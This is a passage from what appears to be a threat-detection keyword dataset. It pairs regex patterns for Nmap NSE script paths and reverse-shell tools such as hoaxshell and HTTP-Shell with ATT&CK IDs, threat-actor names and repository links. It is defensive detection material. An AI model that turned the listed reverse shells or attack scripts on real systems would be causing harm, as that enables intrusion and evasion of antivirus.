Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7920" "*/http-robtex-reverse-ip.nse*",".{0,1000}\/http\-robtex\-reverse\-ip\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7921" "*/http-robtex-shared-ns.nse*",".{0,1000}\/http\-robtex\-shared\-ns\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7922" "*/https_payload.ps1*",".{0,1000}\/https_payload\.ps1.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. 
solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","7923" "*/http-sap-netweaver-leak.nse*",".{0,1000}\/http\-sap\-netweaver\-leak\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7924" "*/http-security-headers.nse*",".{0,1000}\/http\-security\-headers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7925" "*/http-server-header.nse*",".{0,1000}\/http\-server\-header\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7926" "*/HTTP-Shell.git*",".{0,1000}\/HTTP\-Shell\.git.{0,1000}","offensive_tool_keyword","HTTP-Shell","MultiPlatform HTTP Reverse Shell","T1573.001 - T1104 - T1205 - T1110","TA0005 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/HTTP-Shell","1","1","N/A","N/A","10","10","231","33","2024-09-27T10:23:14Z","2023-09-05T12:01:17Z","7927" "*/http-shellshock.nse*",".{0,1000}\/http\-shellshock\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7928" "*/http-sitemap-generator.nse*",".{0,1000}\/http\-sitemap\-generator\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7929" "*/http-slowloris.nse*",".{0,1000}\/http\-slowloris\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7930" "*/http-slowloris-check.nse*",".{0,1000}\/http\-slowloris\-check\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7931" "*/http-sql-injection.nse*",".{0,1000}\/http\-sql\-injection\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7932" "*/https-redirect.nse*",".{0,1000}\/https\-redirect\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7933" "*/http-stored-xss.nse*",".{0,1000}\/http\-stored\-xss\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7934" "*/http-svn-enum.nse*",".{0,1000}\/http\-svn\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7935" "*/http-svn-info.nse*",".{0,1000}\/http\-svn\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7936" "*/http-tenda-enum.nse*",".{0,1000}\/http\-tenda\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","1","N/A","N/A","N/A","10","968","369","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z","7937" "*/http-title.nse*",".{0,1000}\/http\-title\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7938" "*/http-tplink-dir-traversal.nse*",".{0,1000}\/http\-tplink\-dir\-traversal\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7939" "*/http-trace.nse*",".{0,1000}\/http\-trace\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7940" "*/http-traceroute.nse*",".{0,1000}\/http\-traceroute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7941" "*/http-trane-info.nse*",".{0,1000}\/http\-trane\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7942" "*/http-unsafe-output-escaping.nse*",".{0,1000}\/http\-unsafe\-output\-escaping\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7943" "*/http-useragent-tester.nse*",".{0,1000}\/http\-useragent\-tester\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7944" "*/http-userdir-enum.nse*",".{0,1000}\/http\-userdir\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7945" "*/http-vhosts.nse*",".{0,1000}\/http\-vhosts\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7946" "*/http-virustotal.nse*",".{0,1000}\/http\-virustotal\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7947" "*/http-vlcstreamer-ls.nse*",".{0,1000}\/http\-vlcstreamer\-ls\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7948" "*/http-vmware-path-vuln.nse*",".{0,1000}\/http\-vmware\-path\-vuln\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7949" "*/http-vuln-cve2006-3392.nse*",".{0,1000}\/http\-vuln\-cve2006\-3392\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7950" "*/http-vuln-cve2009-3960.nse*",".{0,1000}\/http\-vuln\-cve2009\-3960\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7951" "*/http-vuln-cve2010-0738.nse*",".{0,1000}\/http\-vuln\-cve2010\-0738\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7952" "*/http-vuln-cve2010-2861.nse*",".{0,1000}\/http\-vuln\-cve2010\-2861\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7953" "*/http-vuln-cve2011-3192.nse*",".{0,1000}\/http\-vuln\-cve2011\-3192\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7954" "*/http-vuln-cve2011-3368.nse*",".{0,1000}\/http\-vuln\-cve2011\-3368\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7955" "*/http-vuln-cve2012-1823.nse*",".{0,1000}\/http\-vuln\-cve2012\-1823\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7956" "*/http-vuln-cve2013-0156.nse*",".{0,1000}\/http\-vuln\-cve2013\-0156\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7957" "*/http-vuln-cve2013-6786.nse*",".{0,1000}\/http\-vuln\-cve2013\-6786\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7958" "*/http-vuln-cve2013-7091.nse*",".{0,1000}\/http\-vuln\-cve2013\-7091\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7959" "*/http-vuln-cve2014-2126.nse*",".{0,1000}\/http\-vuln\-cve2014\-2126\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7960" "*/http-vuln-cve2014-2127.nse*",".{0,1000}\/http\-vuln\-cve2014\-2127\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7961" "*/http-vuln-cve2014-2128.nse*",".{0,1000}\/http\-vuln\-cve2014\-2128\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7962" "*/http-vuln-cve2014-2129.nse*",".{0,1000}\/http\-vuln\-cve2014\-2129\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7963" "*/http-vuln-cve2014-3704.nse*",".{0,1000}\/http\-vuln\-cve2014\-3704\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7964" "*/http-vuln-cve2014-8877.nse*",".{0,1000}\/http\-vuln\-cve2014\-8877\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7965" "*/http-vuln-cve2015-1427.nse*",".{0,1000}\/http\-vuln\-cve2015\-1427\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7966" "*/http-vuln-cve2015-1635.nse*",".{0,1000}\/http\-vuln\-cve2015\-1635\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7967" "*/http-vuln-cve2017-1001000.nse*",".{0,1000}\/http\-vuln\-cve2017\-1001000\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
